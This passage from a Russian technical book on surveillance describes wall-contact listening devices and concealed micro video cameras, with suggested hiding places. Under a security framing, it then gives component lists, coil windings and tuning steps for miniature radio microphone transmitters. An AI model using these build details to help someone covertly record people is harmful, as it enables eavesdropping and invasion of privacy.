Стетоскоп представлет собой вибродатчик, усилитель и головные телефоны. Схема применения стетоскопа приведена на рис. 1.24.

Вибродатчик специальной мастикой прикрепляется к стене, потолку и т.п. Размеры датчика, на примере устройства DTI, составляют 2.2х0.8 см, диапазон частот - ЗОО-ЗООО Гц, вес - 126 г, коэффициент усиления - 20000.

С помощью подобных устройств можно осуществлять прослушивание разговора через стены толщиной до 1 м. Стетоскоп может оснащаться проводом, радио или другим каналом передачи информации. Основным преимуществом стетоскопа можно считать трудность обнаружения, т.к. он может устанавливаться в соседних помещениях.

В качестве примера приведем два устройства - SIPE RS и SIPE ОРТО2000, отличающиеся каналом передачи. Микрофон-стетоскоп размером 2хЗ см обеспечивает прослушивание через стены толщиной до 50 см и оконные рамы с двойными стеклами. Мощность передатчика SIPE RS - 20 мВт, дальность - 250 м. Размеры передатчика составляют 44х32х14 мм, масса - 41 г, время непрерывной работы - 90 часов. ИК система SIPE ОРТО 2000 обеспечивает радиус действия 500 м и имеет широкую диаграмму направленности. Существуют стетоскопы, в которых чувствительный элемент, усилитель и радиопередатчик объединены в одном корпусе. Имеющий очень небольшие габариты, радиостетоскоп достаточно прикрепить с помощью специальной липкой массы к стене, полу или потолку в соседнем помещении. В качестве примера такого стетоскопа на рис. 1.25 изображен стетоскоп АД-50.

Этот компактный стетоскоп позволяет не только прослушивать разговоры через стены, оконные рамы, двери, но и передавать информацию по радиоканаду. Имеет высокую чувствительность и обеспечивает хорошую разборчивость речевого сигнала. Рабочая частота составляет 470 МГц. Дальность передачи - до 100 м. Время непрерывной работы - 24 ч, размеры - 40х23 мм Большинством специалистов прогнозируется постоянный рост случаев применения стетоскопов, что прежде всего объясняется удобством применения подобной техники, а также тем, что их чрезвычайно трудно обнаружить.

Рис. 1.23 Схема применения лазерного микрофона

Изображение: 

Рис. 1.24 Схема применения стетоскопа

Изображение: 

Рис. 1.25 Компактный стетоскоп

Изображение: 

1.5. Системы и устройства видеоконтроля

1.5. Системы и устройства видеоконтроля

1.5.1. Общие сведения

Системы и устройства видеоконтроля получили мощный импульс своего развития в связи с созданием миниатюрных видеокамер и видеомагнитофонов. Если история применения фотокамер в разведке насчитывает 90-100 лет, то применение видеотехники сдерживалось неприемлемыми ее весогабаритными характеристиками. В настоящее время габаpиты видеокамер (без видеомагнитофонов) часто могут быть меньше самых миниатюрных фотокамер. Между тем, применение видеотехники в коммерческой разведке часто дает преимущества, недостижимые с помощью фото- и кинотехники. Прежде всего это то, что с помощью видеотехники легко осуществить запись, передачу на большие расстояния и оперативный анализ зрительной и звуковой информации в реальном масштабе времени.

Достижения миниатюризации в видеотехнике продемонстрированы на рис. 1.26.

Обобщенная структурная схема передающей части системы видеонаблюдения изображена на рис. 1.27.

В упрощенном виде система видеонаблюдения состоит из видеокамеры, видеомагнитофона и (или) передатчика.

1.5.2. Микровидеокамеры

Предлагаемые к реализации и имеющие приемлемые характеристики для целей коммерческой разведки видеокамеры имеют, в основном, импортное происхождение. Отечественные камеры по габаритным характеристикам пригодны пока только для систем видеоконтроля (служебные помещения, видеодомофоны, магазины и т.д.).

Остановимся более подробно на характеристиках некоторых конкретных моделей камер зарубежного производства. Наибольший интерес в данном случае представляет описание бескорпусных видеокамер. На рис. 1.28 изображена бескорпусная черно-белая микровидеокамера.

Объектив и электронная схема управления размещаются на одной плате размером 4.2х4.2 см. Стандартный объектив имеет фокусное расстояние 3,6 мм. С этим объективом камера имеет габариты 4.2х4.2х2.1 см и угол обзора 92°. С точечным объективом габариты составляют 4.2х4.2х1.2 см, угол обзора - 88°.

Независимо от типа объектива, камера имеет следующие характеристики: минимальная освещенность - 0,4 лк, разрешение - 380 линий, питание - 12 В, вес - 12 г.

На рис. 1.29 изображена цветная микровидеокамера VPC-715 (PAL).

Стандартный объектив имеет фокусное расстояние 5,6 мм, угол обзора 56°, разрешение: PAL - 512(H)x582(V). Камера может работать при освещенности до 2,5 лк. Габариты 4.2х8.4хЗ.0 см со стандартным и 4,2х8,4х1,2 см с точечным объективами. Вес - 30 г.

Эти и им подобные камеры могут монтироваться как вместе с объективом, так и с вынесенным объективом. Маскировка может быть самой различной: в розетках электропитания, радиоприемниках, настенных и настольных часах, одежде, очках, датчиках пожарной сигнализации, приборах освещения и т.д.

Мы не приводим рисунки этих видеокамер по той простой причине, что они по внешнему виду ничем не отличаются от обычных.

Видеокамеры могут снабжаться различными сменными объективами. Нужно иметь в виду, что некоторые материалы, применяемые для маскировки объектов (типа "черное стекло"), пропускают только небольшую часть спектра и могут успешно работать при солнечном освещении, при освещении ИК прожектором или обычными лампами накаливания, но их применение невозможно при освещении объекта люминесцентными или галогеновыми лампами.

Представляет интерес описание видеокамеры с передатчиком. Например, это может быть OVS-25-5, изображенная на рис. 1.30. Разрешение этой камеры - 380 линий. Чувствительность - 0,5 лк, объектив с фокусным расстоянием 1,6 мм и автоматической регулировкой диафрагмы. Встроенный передатчик работает в диапазоне 400-500 МГц и имеет мощность 40 мВт. Питание внешнее 12 В, потребляемый ток - 120 мА. Габариты - 3,8х4,5х5,9 см, вес - 120 гр.

1.5.3. Устройства дистанционного управления, видеодетектор движения

Устройство управления служит для наведения камеры на заданный объект, включения-выключения передатчика, видеомагнитофона, инфракрасного осветителя. В самом простом случае это устройство задает скорость и угол сканирования. В качестве примера на рис. 1.31 изображено поворотное устройство OVS-32, управление которым осуществляется с помощью выносного пульта.

Специальное поворотное устройство для видеокамер имеет следующие возможности:

  • Угол поворота автоматического сканирования составляет 180° или задается с помощью пульта управления.
  • Плавная и бесшумная работа поворотного механизма.
  • Возможность крепления на стене с помощью специального кронштейна.

Максимальная нагрузка - 7 кг, габаритные размеры - 146х124 мм, вес - 1,4 кг.

Для миниатюрных камер можно применить, например, устройство РТИ-II, имеющее габариты 6.5хЗ.3 см. Такое устройство изображено на рис. 1.32.

Миниатюрный прибор наведения применяется в помещении. Максимальная нагрузка - не более одного фунта. Предназначен для использования с камерами типа Watec, имеет цилиндрический корпус, угол горизонтального вращения - 350°, скорость вращения регулируется. Угол наклона - 180°, скорость также регулируется. Напряжение питания - 12 В постоянного тока (60 мА).

Более сложные устройства дистанционного управления имеют функции дистанционного включения (например, через нормально-разомкнутое реле). Включение может осуществляться посредством таймера, выключателя беспроводного активатора (например, с использованием радиоканала), дверных контактов, а также детектора движения. В качестве примера такого управляющего устройства можно привести изделие N 92444 производства США. Процессор данного устройства программируется в режиме таймера, ручного управления или дежурном режиме. Имеет генератор времени и даты для фиксации момента совершения записи происшествия, а также позволяет запрограммировать титры из двух строк по 20 знаков. Габариты - 14х18х4 см.

Видеодетектор движения служит для активизации аппаратуры при изменении положения на наблюдаемом объекте.

В качестве примера такого устройства опишем модель N 94501. Этот детектор имеет регулируемую чувствительность, исключает ложные срабатывания при изменении освещенности, возможна автоматическая настройка. Размер изображения регулируется от 5 до 90% от объекта наблюдения, имеется выход для подачи сигнала тревоги.

1.5.4. Инфракрасные осветители

Применение ИК осветителей бывает необходимо при работе в условиях недостаточной видимости, а также в том случае, если для маскировки объектива видеокамеры применены непрозрачные в видимом диапазоне материалы. Инфракрасные осветители могут выпускаться либо отдельно, либо совмещенными с видеокамерами. В качестве примера совмещенного с камерой ИК осветителя можно привести изделие фирмы SANYO - VDC-9212. Эта черно-белая видеокамера может работать в полной темноте. Разрешение - 400 линий, габариты - 10х5 см. Отдельно выполненный ИК осветитель N 91101, использует излучающий элемент на основе галиево-алюминиевого арсенида (GaALAs) со спектром излучения в районе 880 нм, помещенный в алюминиевый корпус. Потребляемый ток - 600 мА. Габариты - 10х5х4.5 см.

1.5.5. Миниатюрные видеомагнитофоны

Самым распространенным режимом видеонаблюдения является режим с одновременной записью на видеомагнитофон. Наиболее широка для этих целей применяются видеомагнитофоны, рассчитанные на работу с 8 мм видеокассетой. Видеомагнитофоны имеют, как правило, функцию дистанционного управления, звук записывается в режиме стерео.

Некоторые модели снабжены видеомонитором. Приведем характеристики некоторых моделей таких видеомагнитофонов. OVS-9 имеет две скорости записи, время записи - до 5 часов. Питание осуществляется от встроенного аккумулятора или внешнего источника питания напряжением 7,5 В. Потребляемая мощность - 4 Вт, габариты - 148х130х62 мм, вес - 670г(рис.1.33).

Модель OVS-9-1 (рис. 1.34) представляет собой видеомагнитофон OVS-9 со встроенным цветным плоским монитором. Монитор удобен при монтаже и настройке скрытых видеокамер, а также для контроля действующих видеосистем и просмотра снятого видеоматериала. Габариты - 150х135х70 мм, вес - 700 г.

1.5.6. Беспроводные линии передачи и приема видеоинформации

Обобщенная схема беспроводной линии передачи и приема видеоинформации представлена на рис. 1.35.

На рис. 1.36 изображены блоки приемника и передатчика линии передачи-приема видеоизображения и звука модели WVL-90.


Рабочая частота комплекта составляет от 904 до 928 МГц. Линия в сосотоянни передавать цветное или черно-белое изображение на расстояние от 300 до 900 м, в зависимости от типа используемой антенны (встроенная плоская антенна или внешняя антенна высокого усиления типа WVLA-902), отношение сигнал/шум не менее 45 дБ. Питание от внешнего источника питания - 10-25 В, потребляемый ток передатчика - не менее 50 мА, приемника - не менее 20 мА. Габариты передатчика - 23х6.Зх9.5 см, приемника - 23х70х12 см.

Коммутатор применяется в случае работы одновременно с несколькими видеосигналами. Он передает сигнал одновременно на видеомагнитофон и (или) монитор. Например, коммутатор модели OVS-31 позволяет выводить на монитор сигналы от 4 до 12 видеокамер. Время показа сигнала регулируемое - от 1 до 20 с. Возможно исключение любой камеры из режима просмотра. Питание от сети, габариты - 6,Ох26,5х24,0 см, - вес 3,3 кг. Характеристики одного из мониторов, используемого в подобных линиях, рассмотрим на примере изделия OVS-27. Разрешение - 850 линий, экран с диагональю 25 см, встроенный динамик, частота горизонтальной развертки - 15,625 Гц (15,750 Гц), частота вертикальной развертки 50 Гц (60 Гц), электропитание от сети, амплитуда входного видео@ сигнала - до 2 В, потребляемая мощность - 30 Вт, габариты - 235х220х250 мм, вес - 6,2 кг.

Рис. 1.26 Микровидеокамера в очках OVS-35

Изображение: 

Рис. 1.27 Обобщенная структурная схема передающей части системы видеонаблюдения

Изображение: 

Рис. 1.28 Бескорпусная черно-белая камера VPC-465

Изображение: 

Рис. 1.29 Цветная микровидеокамера VPC-715 (PAL).

Изображение: 

Рис. 1.30 Портативный видеомагнитофон OVS-9

Изображение: 

Рис. 1.31 Поворотное устройство OVS-32

Изображение: 

Рис. 1.32 Миниатюрное устройство наведения

Изображение: 

Рис. 1.33 Портативный видеомагнитофон OVS-9

Изображение: 

Рис. 1.34 Видеомагнитофон с цветным монитором OVS-9-1

Изображение: 

Рис. 1.35 Обобщенная схема беспроводной линии передачи и приема видеоинформации

Изображение: 

Рис. 1.36 Линия передачи-приема видеоизображения и звука модели WVL-90

Изображение: 

3. Глава 2. Технические средства защиты объектов

Глава 2. Технические средства защиты объектов

В настоящее время радиолюбительский рынок прочно наводнили устройства, которые используются в системах оповещения и сигнализации. Эти устройства, от самых простых до сложных, собраны, как правило, по стандартным классическим схемам. Данная глава представляет собой обзор широко распространенных радиолюбительских схем устройств, работающих в разрешенных радиолюбительских диапазонах. Проведена попытка классифицировать эти схемы по ряду параметров. Принципиальные схемы сопровождаются описанием их работы и рекомендациями по монтажу и настройке. Все рассматриваемые устройства доступны для повторения начинающими радиолюбителями-конструкторами, не обладающими глубокими теоретическими знаниями в электронике, и могут быть использованы для охраны таких объектов, как дачи, квартиры, офисы, автомобили, контейнеры и т.п. от несанкционированного доступа.

В первом разделе данной главы рассматриваются радиопередающие устройства систем оповещения и сигнализации, позволяющие осуществлять дистанционный акустический контроль охраняемых объектов и использующие в качестве датчиков микрофоны. Возможно использование этих устройств с любыми видами датчиков. В этом разделе приведены описания устройств, как говорят, на все случаи жизни - от простейших и маломощных, работающих в пределах одной квартиры или офиса, до мощных и высокостабильных передатчиков, используемых для охраны дачи или автомобиля, от низкочастотных до высокочастотных, от миниатюрных до крупноразмерых. Этот раздел включает в себя подразделы по вышеперечисленным признакам, поэтому найти описание необходимого устройства не составит большого труда.

Во втором разделе приведены схемы телефонных ретрансляторов, позволяющие использовать общедоступные радиовещательные магнитолы в качестве составной части автоответчиков.

В третьем разделе главы приводятся описания одноканальных систем контроля акустики помещений с дальностью действия от десятков до сотен метров, применяемых для контроля акустики удаленных помещений с целью охраны. Тут же рассмотрены и вибродатчики, способные преобразовывать виброколебания, например, стекла или корпуса автомобиля, и электрические колебания. Чувствительные и узконаправленные микрофоны, используемые для выявления посторонних звуков на территории объектов, можно также использовать для записи голосов птиц н зверей с безопасного расстояния.

В четвертом разделе главы описываются различные радиолюбительские радиоприемные устройства, являющиеся составной частью систем оповещения и сигнализации. Они подразделяются по своему назначению и сложности. Приведены описания приемников, конструктивно выполненных на различной элементной базе, указаны их технические характеристики, даны рекомендации по использованию, монтажу и настройке.

Материал, представленный в данной главе, собран и систематизирован на основе публикаций различных источников, предназначенных для широкого круга читателей. Список используемой литературы представлен в конце книги.

2.1. Радиопередатчики систем оповещения и сигнализации

2.1. Радиопередатчики систем оповещения и сигнализации

2.1.1. Миниатюрные радиопередатчики

2.1.1. Миниатюрные радиопередатчики

Миниатюрный радиопередатчик на туннельном диоде

Среди большого семейства радиопередатчиков можно выделить те устройства, которые имеют простое схемное решение, малое количество деталей и при всем этом обладают достаточно хорошими характеристиками. Схема простого микропередатчика изображена на рис. 2.1.

Основу этого устройства составляет схема высокочастотного генератора на туннельном диоде. Ток, потребляемый генератором от источника питания, составляет примерно 15 мА и зависит от типа туннельного диода. Тип туннельного диода может быть выбран, по усмотрению радиолюбителя, с током потребления не более 10-15 мА (например, диод АИ201А).

Генератор сохраняет свою работоспособность при напряжении источника питания 1 В и выше при соответствующем выборе рабочей точки резистором R2. Дроссель Др1 наматывается на резисторе МЛТ 0,25 проводом ПЭВ 0,1 и содержит 200-300 витков. Чтобы провод не соскакивал с резистора, он периодически смазывается клеем "Момент", БФ-2 или другим. Индуктивность дросселя должна быть 100-200 мкГн. Дроссель может быть заводского изготовления. Катушка колебательного контура L1 выполнена без каркаса и содержит 7 витков провода ПЭВ 1,0 мм. Диаметр катушки 8 мм, длина намотки 13 мм. Катушка связи L2 так же, как и L1I - бескаркасная, намотана проводом ПЭВ 0,35 мм, 3 витка, диаметр катушки 2,5 мм, длина намотки - 4 мм. Катушка L2 располагается внутри катушки колебательного контура L1.

Настройка передатчика сводится к установке рабочей точки туннельного диода путем вращения движка подстроечного резистора R2 до появления устойчивой генерации и подстройке частоты колебаний конденсатором С4. Антенной является отрезок монтажного провода длиной примерно в четверть длины волны. Глубину модуляции можно изменить подбором сопротивления резистора К1. Сигнал этого передатчика можно принимать на телевизионный приемник.

Значительно упростить конструкцию радиомикрофона можно при использовании малогабаритных конденсаторных микрофонов, включаемых непосредственно в колебательный контур высокочастотного генератора. Возможная схема такого передатчика представлена на рис. 2.2.

Как известно, конденсаторный микрофон выполнен в виде развернутого конденсатора с двумя плоскими неподвижными электродами, параллельно которым закреплена мембрана (тонкая фольга, металлизированная диэлектрическая пленка и т. п.), электрически изолированная от неподвижных электродов. Выступая элементом контура, конденсаторный микрофон осуществляет частотную модуляцию. В остальном описание схемы и настройка передатчика аналогичны вышеприведенной схеме.

Мощность излучения вышеприведенных устройств, составляет доля единиц мВт. Соответственно, и радиус действия этих устройств составляет единицы - десятки метров.

Микропередатчик с ЧМ на транзисторе

Схема микропередатчика, выполненного на транзисторе, приведена на рис. 2.3.

Модулирующее напряжение, снимаемое с электретного микрофона МКЭ-3 (МКЭ-333, МКЭ-389, М1-А2 "Сосна"), через конденсатор С1 поступает на базу транзистора VT1, на котором выполнен задающий генератор. Так как управляющее напряжение приложено к базе транзистора VT1, то, изменяя напряжение смещения на переходе база-эмиттер, и, соответственно, емкость цепи база-эмиттер, которая является одной из составных частей колебательного контура задающего генератора, осуществляется частотная модуляция передатчика. Этот контур включает в себя также катушку индуктивности L1, расположенную по высокой частоте между базой транзистора VT1 и массой, и конденсаторами СЗ и С4. Конденсатор С4 включен в цепь обратной связи емкостной трехточки, являясь одним из плеч делителя С6 - С4, с которого и снимается напряжение обратной связи. Емкость конденсатора С4 позволяет регулировать уровень возбуждения. Во избежание влияния шунтирующего резистора R2 в цепи эмиттера транзистора VT1 на колебательный контур, которое может вызвать чрезмерное расширение полосы частот резонансной кривой, последовательно с резистором R2 включен дроссель Др1, блокирующий прохождение токов высокой частоты. Индуктивность этого дросселя должна быть около 20 мкГн. Катушка L1 бескаркасная, диаметром 3 мм намотана проводом ПЭВ 0,35 и содержит 7-8 витков.

Для получения максимально возможной мощности необходимо правильно выбрать генерирующий элемент (транзистор VT1) и установить оптимальный режим работы генератора. Для этого необходимо применять транзисторы, верхняя граничная частота которых должна превышать рабочую частоту генератора не менее чем в 7-8 раз. Этому условию наиболее полно отвечают транзисторы типа n-p-n КТЗ68, хотя можно использовать и более распространенные транзисторы КТЗ15 или КТЗ102.

Миниатюрный радиопередатчик с питанием от батареи для электронных часов

Схема следующего радиопередатчика приведена на рис. 2.4.

Устройство содержит минимум необходимых деталей и питается от батарейки для электронных часов напряжением 1,5 В. При столь малом напряжении питания и потребляемом токе 2-3 мА сигнал этого радиомикрофона может приниматься на удалении до 150 м. Продолжительность работы около 24 ч. Задающий генератор собран на транзисторе VT1 типа КТЗ68, режим работы которого по постоянному току задается резистором R1. Частота колебаний задается контуром в базовой цепи транзистора VT1. Этот контур включает в себя катушку L1, конденсатор СЗ и емкость цепи база-эмиттер транзистора VT1, в коллекторную цепь которого в качестве нагрузки включен контур, состоящий из катушки L2 и конденсаторов С6, С7. Конденсатор С5 включен в цепь обратной связи и позволяет регулировать уровень возбуждения генератора. В автогенераторах подобного типа частотная модуляция производится путем изменения потенциалов выводов генерирующего элемента. В чашем случае управляющее напряжение прикладывается к базе транзистора VT1, изменяя тем самым напряжение смещения на переходе база-эмиттер и, как следствие, изменяя емкость перехода базаэмиттер. Изменение этой емкости приводит к изменению резонансной частоты колебательного контура, что и приводит к появлению частотной модуляции. При использовании УКВ приемника импортного производства требуемая величина максимальной девиации несущей частоты составляет 75 кГц (для отечественного стандарта - 50 кГц) и получается при изменении напряжения звуковой частоты на базе транзистора в диапазоне 10-100 мВ. Именно по этому в данной конструкции не используется модулирующий усилитель звуковой частоты. При использовании электретного микрофона с усилителем, например, МКЭ-З, М1-Б2 "Сосна", уровня сигнала, снимаемого непосредственно с выхода микрофона, оказалось достаточно для получения требуемой девиации частоты радиомикрофона. Конденсатор С1 осуществляет фильтрацию колебаний высокой частоты. Конденсатором С7 можно в небольших пределах изменять значение несущей частоты.

Сигнал в антенну поступает через конденсатор С8,емкость которого специально выбрана малой для уменьшения влияния возмущающих факторов на частоту колебаний генератора. Антенна сделана из провода или металлического прутка длинной 60-100 см. Длину антенны можно уменьшить, если между ней и конденсатором С8 включить удлинительную катушку L3 (на рис. 2.4 не показана). Катушки радиомикрофона бескаркасные, диаметром 2,5 мм, намотаны виток к витку. Катушка L1 имеет 8 витков, катушка L2 - 6 витков, катушка L3 - 15 витков провода ПЭВ 0,3. При настройке устройства добиваются получения максимального сигнала высокой частоты, изменяя индуктивности катушек L1 и L2. Подбором конденсатора С7 можно немного изменять величину несущей частоты, в некоторых случаях его можно исключить совсем.

Микропередатчик со стабилизацией тока.

Схема предлагаемого миниатюрного устройства заметно отличается от приведенных выше. Она проста в настройке и изготовлении, позволяет изменять частоту задающего генератора в широких пределах. Устройство сохраняет работоспособность при величине питающего напряжения млше 1 В. Схема радиопередатчика приведена на рис. 2.5.

Генератор высокой частоты собран по схеме мультивибратора с индуктивной нагрузкой. Изменение частоты колебаний высокой частоты происходит при изменении тока, протекающего через транзисторы VT1, VT2 типа КТЗ68. При изменении тока зменяются параметры проводимости транзисторов и их диффузионные емкости, что позволяет варьировать частоту такого генератора в широких пределах без изменения частотозадающих элементов - катушек L1 и L2. Для повышения стабильности частоты и для возможности управления генератором с целью получения частотной модуляции питание последнего осуществляется через стабилизатор тока.

Стабилизатор и модулирующий усилитель выполнены на электретном микрофоне М1 типа МКЭ-З, М1-Б2 "Сосна" и им подобным. При использовании кондиционных деталей уход несущей частоты при изменении напряжения питания с 1,5 до 12 В не превышает 150 кГц (при средней частоте генератора равной 100 МГц).

В схеме используются бескаркасные катушки L1 и L2 диаметром 2,5 мм. Для диапазона 65-108 МГц катушки содержат по 15 витков провода ПЭВ 0,3. Настройка заключается в подгонке частоты путем изменения индуктивности катушек L1 и L2 (сжатием или растяжением). Рассматриваемый генератор может работать на частотах до 2 ГГц, при использовании транзисторов типа КТЗ86, КТЗ101, КТЗ124 и им подобных и при изменении конструкции контурных катушек.

Микропередатчик с ЧМ в диапазоне частот 80-100 МГц.

Схема сверхмаломощного передатчика диапазона 80-100 МГц с частотной модуляцией представлена на рис. 2.6.

Его выходная мощность 0,5 мВт, потребляемый ток не превышает 2 мА. Питание осуществляется от аккумуляторного элемента напряжением 1,5 В.

Задающий генератор УКВ диапазона выполнен на полевом транзисторе VT1 типа КПЗ13А по схеме индуктивной трехточки с использованием проходной емкости МОП-транзистора. В генератор входят элементы VT1, VD1, L1, L2, С2, R3, а также соединительные и общий провода.

Модулирующий сигнал с выхода микрофона М1 через конденсатор С1 и делитель напряжения R1, R2, R3 поступает на варикапную матрицу VD1 типа KBC111А, изменение емкости которой приводит к частотной модуляции задающего генератора. Делитель напряжения на резисторах R1 и R2 служит для установки рабочей точки варикапа VD1. Катушка L1 - бескаркасная, она состоит из 7 витков провода ПЭВ 0,44 с отводом от 3 витка, считая от заземленного вывода. Внутренний диаметр катушки L1 - 4 мм. Катушка L2 содержит 1 виток того же провода, что и катушка L1. Ее нужно разместить соосно катушке L1 и по возможности ближе к ее заземленному выводу. В качестве антенны используется отрезок монтажного провода длиной 0,8 м, который для компактности может быть скручен в спираль.

Настройка передатчика сводится к установке частоты 88-108 МГц путем изменения индуктивности L1. Частоту настройки контролируют по промышленному приемнику. Транзистор генератора должен иметь ток не менее 1-1,5 мА (при замкнутой накоротко катушке L1).

В заключение хотелось бы отметить, что при увеличении напряжения источника питания до 4,5 В выходная мощность высокочастотного генератора возрастет до 10 мВт. При этом для-сохранения девиации частоты рекомендуется подобрать сопротивление резистора R3.

Рис. 2.1 Миниатюрный радиопередатчик на туннельном диоде

Изображение: 

Рис. 2.2. Малогабартиный конденсаторный микрофон

Изображение: 

Рис. 2.3 Микропередатчик ч астотной модуляцией

Изображение: 

Рис. 2.4 Редиопередатчик с питанием от батареи 1,5 В

Изображение: 

Рис. 2.5 Микропередатчик со стабилизацией тока

Изображение: 

Рис. 2.6 Микропередатчик с частотной модуляцией

Изображение: 

2.1.2. Радиопередатчики малой мощности

2.1.2. Радиопередатчики малой мощности

Радиопередатчик с ЧМ в УКВ диапазоне частот 61-73 МГц

Радиопередатчик (рис. 2.7) представляет собой однокаскадный УКВ ЧМ передатчик, работающий в вещательном диапазоне 61-73 МГц. Выходная мощность передатчика при использовании источника питания с напряжением 9-12 В - примерно 20 мВт. Он обеспечивает дальность передачи информации около 150 м при использовании приемника с чувствительностью 10 мкВ.

Режимы транзисторов УЗЧ (VT1) и генератора ВЧ (VT2) по постоянному току задаются резисторами КЗ и R4 соответственно. Напряжение 1,2 В на них и на питание микрофона М1 подается с параметрического стабилизатора на К1, С1, VD1. Поэтому устройство сохраняет свою работоспособность при снижении напряжения питания до 4-5 В. При этом наблюдается уменьшение выходной мощности устройства, а несущая частота изменяется незначительно.

Модулирующий усилитель выполнен на транзисторе VT1 типа КТЗ15. Напряжение звуковой частоты на его вход поступает с электретного микрофона с усилителем М1 типа МКЭ-З и ему подобным. Усиленное напряжение звуковой частоты с коллектора транзистора VT1 поступает на варикап VD2 типа КВ109А через фильтр нижних частот на резистор R5 и конденсатор С5, и резистор R7. Варикап VD1 включен последовательно с подстроечным конденсатором С8 в эмнттерную цепь транзистора VT2. Частота колебаний задающего генератора, выполненного на транзисторе VT2 типа КТЗ15 (КТЗ102, КТЗ68), определяется элементами контура L1, С6, С7 и емкостью С8 и VD1.

Вместо светодиода VD1 типа АЛЗО7 можно использовать любой другой светодиод или три последовательно включенных в прямом направлении диода типа КД522 и им подобных. Катушка L1 бескаркасная, диаметром 8 мм, имеет 6 витков провода ПЭВ 0,8.

При налажнаании передатчик настраивают на свободный участок УКВ ЧМ диапазона сжатием или растяжением витков катушки L1 или подстройкой конденсатора С8. Девиация частоты устанавливается конденсатором С8 по наиболее качественному приему на контрольный приемник. Передатчик можно настроить и на вещательный диапазон УКВ ЧМ (88-108 МГц), для этого необходимо уменьшить число витков L1 до 5 и емкость конденсаторов С6 и С7 до 10 пФ. В качестве антенны используется отрезок провода длинной 60 см. Для уменьшения влияния дестабилизирующих факторов антенну можно подключить через конденсатор емкостью 1-2 пФ.

Радиопередатчик с AM в диапазоне частот 27-28 МГц

Устройство, описанное ниже, представляет собой передатчик, работающий в диапазоне 27-28 МГц с амплитудной модуляцией. Дальность действия до 100 м.

Принципиальная схема устройства приведена на рис. 2.8. Передатчик состоит из генератора высокой частоты, собранного на транзисторе VT2 типа КТЗ15, и однокаскадного усилителя звуковой частоты на транзисторе VT1 типа КТЗ15. На вход последнего через конденсатор С1 поступает звуковой сигнал от микрофона М1 типа "Сосна". Нагрузку усилителя составляют резистор КЗ и генератор высокой частоты, включенный между плюсом источника питания и коллектором транзистора VTI. С усилением сигнала напряжение на коллекторе транзистора VT1 изменяется. Этим сигналом и модулируется амплитуда сигнала несущей частоты генератора передатчика, излучаемая антенной.

В конструкции использованы резисторы МЛТ-0,125, конденсаторы - К10-7В. Вместо транзисторов КТЗ15 можно использовать КТЗ102. Катушка L1 намотана на каркасе из полистирола диаметром 7 мм. Она имеет подстроечный сердечник из феррита 600НН диаметром 2,8 мм и длиной 12 мм. Катушка L1 содержит 8 витков провода ПЭВ 0,15 мм. Намотка - виток к витку. Дроссель Др1 намотан на резисторе МТЛ-0,5 сопротивлением более 100 ком. Обмотка дросселя содержит 80 витков ПЭВ 0,1. В качестве антенны используется стальной упругий провод длиной 20 см.

При настройке частоту устанавливают подстройкой индуктивности катушки L1. После регулировки подстроечный сердечник катушки закрепляется парафином.

Радиопередатчик с ЧМ в диапазоне частот 100-108 МГц

Этот радиомикрофон работает в диапазоне 100-108 МГц с частотной модуляцией. Дальность приема сигнала составляет около 50 м. Питание устройства осуществляется от источника питания от 1,5 до 9 В. Принципиальная схема представлена на рис. 2.9.

Передатчик состоит из однокаскадного усилителя звуковой частоты и однокаскадного генератора высокой частоты. Задающий генератор собран по распространенной схеме. Частота несущей определяется элементами С4, L1, С5 и межэлектродными емкостями транзистора VT2. Модулирующий усилитель выполнен на транзисторе VT1 типа КТЗ15. Усиленный сигнал через конденсатор С2 поступает на эмиттер транзистора VT2 типа КТЗ15. Модулирующее напряжение вызывает изменение емкости перехода база-эмиттер транзистора VT2 и, тем самым, осуществляет частотную модуляцию задающего генератора. Сигнал с генератора через конденсатор С6 поступает в антенну, в качестве которой используется отрезок провода длиной 10-40 см.

Катушка L1 бескаркасная, намотана на оправке диаметром 3 мм и содержит 4 витка провода ПЭВ 0,6 мм, шаг намотки 2 мм.

Настройка радиомикрофона заключается в сжатии или растяжении витков катушки L1 для приема сигнала в свободном от вещательных станций участке УКВ диапазона вещательного приемника.

Рис. 2.7 Радиопередатчик с ЧМ в УКВ диапазоне частот 61-73 МГц

Изображение: 

Рис. 2.8 Радиопередатчик с амплитудной модуляцией в диапазоне частот 27-28 МГц

Изображение: 

Рис. 2.9 Радиопередатчик с частотной модуляциейв диапазоне частот 100-108 МГц

Изображение: 

2.1.3. Радиопередатчики средней мощности

2.1.3. Радиопередатчики средней мощности

Радиопередатчик с широкополосной ЧМ в диапазоне частот 65-108 МГц

Радиомикрофон, принципиальная схема которого приведена на рис. 2.10, работает в диапазоне частот 65-108 МГц с широкополосной частотной модуляцией. Это позволяет принимать сигнал с радиомикрофона на обычный ЧМ приемник этого диапазона. Дальность действия достигает 150-200 м. Продолжительность работы с батареей типа "КРОНА" - около 10 ч.

Низкочастотные колебания с выхода микрофона М1 (типа МКЭ-3, М1-Б2 "Сосна" и им подобных) через конденсатор С1 поступают на усилитель звуковой частоты, выполненный на транзисторе VT1 типа КТЗ15. Усиленный сигнал звуковой частоты, снимаемый с коллектора транзистора VT1, через дроссель Др1 воздействует на варикап VD1 (типа КВ109А), который осуществляет частотную модуляцию радиосигнала, сформированного высокочастотным генератором.

Генератор ВЧ собран на транзисторе VT2 типа КТЗ15. Частота этого генератора зависит от параметров контура L1, СЗ, С4, С5, С6, VD1. Сигнал ВЧ, снимаемый с коллектора транзистора VT2, усиливается усилителем мощности на транзисторе VT3 типа КТЗ61. Усилитель мощности имеет гальваническую связь с задающим генератором. Усиленное высокочастотное напряжение выделяется на дросселе Др2 и поступает на П-образный контур, выполненный на элементах С11, L2, С10. Последний настроен на пропускание основного сигнала п подавление множества гармоник, возникающих на коллекторе транзистора VT3. Радиомикрофон собран на плате размером ЗОх70 мм.

В качестве антенны используется отрезок монтажного провода длиной 25 см. Все детали малогабаритные. Резисторы - типа МЛТ-0,125, конденсаторы - К50-35, КМ, КД. Вместо ваpикаpа VD1 типа КВ109А можно использовать варикапы с другим буквенным индексом иди варикап типа КВ102. Транзисторы могут иметь любой буквенный индекс. Транзисторы VT1 и VT2 можно заменить на КТЗ102, КТЗ68, а транзистор VT3 - на КТЗ26, КТЗ107, КТЗбЗ. Дроссели Др1 и Др2 намотаны на резисторах МЛТ-0,25 сопротивлением более 100 ком проводом ПЭВ 0,1 по 60 витков каждый. Катушки L1 и L2 бескаркасные, диаметром 5 мм. Катушка L1 - 3 витка, катушка L2 - 13 витков провода ПЭВ 0.3.

